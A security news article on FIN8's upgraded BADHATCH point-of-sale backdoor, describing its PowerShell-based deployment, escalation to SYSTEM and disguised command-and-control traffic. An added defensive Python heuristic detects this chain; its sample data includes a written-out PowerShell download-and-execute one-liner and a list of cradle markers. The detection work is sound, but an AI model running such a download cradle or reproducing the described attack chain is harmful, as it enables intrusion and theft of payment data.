FIN8 Hackers Return With More Powerful Version of BADHATCH PoS Malware (Security News, March 2021)

One such group is FIN8, a financially motivated threat actor that's back in action after a year-and-a-half hiatus with a powerful version of a backdoor with upgraded capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution.
First documented in 2016 by FireEye, FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale systems.
"The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal PowerShell commands."
Noting that at least three different variants of the backdoor have been spotted since April 2020, the researchers said the latest version of BADHATCH abuses a legitimate service called sslp.io to thwart detection during the deployment process: the service is used to download a PowerShell script, which in turn executes the shellcode containing the BADHATCH DLL. Besides establishing persistence, the PowerShell script also handles privilege escalation, so that every command issued after the script has run executes as the SYSTEM user.
A second evasion technique adopted by FIN8 is to disguise communications with the command-and-control server as legitimate HTTP requests.
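The deployment chain described above (a PowerShell download cradle, followed by code that runs as SYSTEM) is something a defender can look for in process-creation telemetry. The following is an added example, not code from the article or from the researchers it cites: it runs a simple heuristic over a handful of constructed Sysmon-style process events and flags a PowerShell process whose command line contains a download-and-execute pattern, then flags any child of that process that runs as SYSTEM when the parent did not. The event fields, the marker list and the sample data are all assumptions made for the example.

```python
"""Detection heuristic for a PowerShell download cradle followed by
an elevation to SYSTEM, the pattern described in the article.
Added example with constructed data; not the researchers' detection logic."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed field set, Sysmon-like)."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str


# Substrings commonly seen in PowerShell download-and-execute one-liners.
# Heuristic list chosen for this example; tune it to your environment.
CRADLE_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest",
    "invoke-expression", "iex ", "iex(", "-encodedcommand", "-enc ",
    "frombase64string",
)


def is_powershell(ev: ProcEvent) -> bool:
    return ev.image.lower().endswith(("powershell.exe", "pwsh.exe"))


def has_download_cradle(ev: ProcEvent) -> bool:
    """True if a PowerShell process carries a download/execute marker."""
    cl = ev.cmdline.lower()
    return is_powershell(ev) and any(m in cl for m in CRADLE_MARKERS)


def is_system(user: str) -> bool:
    return user.upper().endswith("SYSTEM")


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (finding_kind, pid) pairs for the two stages of the chain."""
    findings: List[Tuple[str, int]] = []
    by_pid = {e.pid: e for e in events}

    # Stage 1: PowerShell fetching and executing remote content.
    for ev in events:
        if has_download_cradle(ev):
            findings.append(("powershell_download_cradle", ev.pid))
    flagged = {pid for _, pid in findings}

    # Stage 2: a child of a flagged PowerShell now running as SYSTEM
    # although its parent did not, i.e. privileges went up across the hop.
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if (parent is not None and parent.pid in flagged
                and is_system(ev.user) and not is_system(parent.user)):
            findings.append(("privilege_escalation_to_system", ev.pid))
    return findings


# Constructed sample telemetry: one benign PowerShell invocation and one
# cradle whose child ends up as SYSTEM. Hostnames and users are made up.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\alice"),
    ProcEvent(150, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Process", r"CORP\alice"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://example.invalid/stage.ps1')\"",
              r"CORP\alice"),
    ProcEvent(300, 200, r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe placeholder.dll,Start", r"NT AUTHORITY\SYSTEM"),
]


if __name__ == "__main__":
    for kind, pid in detect(SAMPLE_EVENTS):
        print(f"{kind}: pid {pid}")
```

The marker list is deliberately loose (substring matching will produce false positives on legitimate administration scripts), so in practice this belongs behind an allow-list of known management tooling, and the SYSTEM check should be paired with the parent process lineage rather than used on its own.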
"Like most persistent and skilled cyber-crime actors, FIN8 operators are constantly refining their tools and tactics to avoid detection," the researchers concluded, urging businesses to "Separate the POS network from the ones used by employees or guests" and filter out emails containing malicious or suspicious attachments.